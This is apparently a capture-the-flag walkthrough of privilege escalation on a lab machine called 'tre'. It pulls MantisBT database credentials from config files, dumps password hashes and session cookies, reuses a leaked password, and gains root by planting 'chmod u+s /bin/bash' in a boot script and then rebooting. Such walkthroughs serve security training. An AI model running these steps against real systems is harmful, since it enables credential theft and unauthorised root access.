Priv Esc

www-data@tre:/var/www/html/mantisbt$ find / -name config_inc.php 2>/dev/null
find / -name config_inc.php 2>/dev/null
/var/www/html/system/config/config_inc.php
/var/www/html/mantisbt/config/config_inc.php
www-data@tre:/var/www/html/mantisbt$ cat /var/www/html/mantisbt/config/config_inc.php
<t$ cat /var/www/html/mantisbt/config/config_inc.php
<?php
$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

$g_default_timezone       = 'America/New_York';

$g_crypto_master_salt     = 'uuvODlMDm11FeEgAJ5Fqo9Nmswufd5ELmgJkEuQGvGA=';

mantissuser:password@123AS

www-data@tre:/dev/shm$ mysql -u mantissuser -p 
mysql -u mantissuser -p
Enter password: password@123AS

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 536
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mantis             |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use mantis;
use mantis;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mantis]> show tables;
show tables;
+-----------------------------------+
| Tables_in_mantis                  |
+-----------------------------------+
| mantis_bug_file_table             |
| mantis_bug_history_table          |
| mantis_bug_monitor_table          |
| mantis_bug_relationship_table     |
| mantis_bug_revision_table         |
| mantis_bug_table                  |
| mantis_bug_tag_table              |
| mantis_bug_text_table             |
| mantis_bugnote_table              |
| mantis_bugnote_text_table         |
| mantis_category_table             |
| mantis_config_table               |
| mantis_custom_field_project_table |
| mantis_custom_field_string_table  |
| mantis_custom_field_table         |
| mantis_email_table                |
| mantis_filters_table              |
| mantis_news_table                 |
| mantis_plugin_table               |
| mantis_project_file_table         |
| mantis_project_hierarchy_table    |
| mantis_project_table              |
| mantis_project_user_list_table    |
| mantis_project_version_table      |
| mantis_sponsorship_table          |
| mantis_tag_table                  |
| mantis_tokens_table               |
| mantis_user_pref_table            |
| mantis_user_print_pref_table      |
| mantis_user_profile_table         |
| mantis_user_table                 |
+-----------------------------------+
31 rows in set (0.001 sec)

MariaDB [mantis]> select * from mantis_user_table;
select * from mantis_user_table;
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
| id | username      | realname      | email          | password                         | enabled | protected | access_level | login_count | lost_password_request_count | failed_login_count | cookie_string                                                    | last_visit | date_created |
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
|  1 | administrator | administrator | root@localhost | 5f4dcc3b5aa765d61d8327deb882cf99 |       1 |         0 |           90 |          42 |                           0 |                  0 | x-WZQzXvLVwezZq8FEhZYau0yBQCvhVWrmh2v9J-RVpgCK5qYdIquwQzGBbs8uLG | 1722909171 |            1 |
|  2 | tre           | Tr3@123456A!  | tre@localhost  | 64c4685f8da5c2225de7890c1bad0d7f |       1 |         0 |           70 |           0 |                           0 |                  0 | bp9uP3SY4tyKMFHSytb2RyecV5fPrsvGjb4sLboLkoyodEPn0NbZID9GhRURGAvf | 1589263108 |   1589263108 |
|  3 | adot8         |               | [email protected] | b5a0c4dbacce8bd078979d1a469684ac |       1 |         0 |           25 |           0 |                           0 |                  1 | elLBNVW12UEebUPLdJnCxI_TpHbi-v9y6XtID4Z_5dKVlicN6JLtz04pxGOrPTGw | 1722903613 |   1722903613 |
+----+---------------+---------------+----------------+----------------------------------+---------+-----------+--------------+-------------+-----------------------------+--------------------+------------------------------------------------------------------+------------+--------------+
3 rows in set (0.000 sec)

MariaDB [mantis]> 

tre:Tr3@123456A!

tre@tre:/var/www/html/mantisbt$ sudo -l
sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown

ssh [email protected]

vi  /usr/bin/check-system
chmod u+s /bin/bash

sudo /sbin/shutdown -r now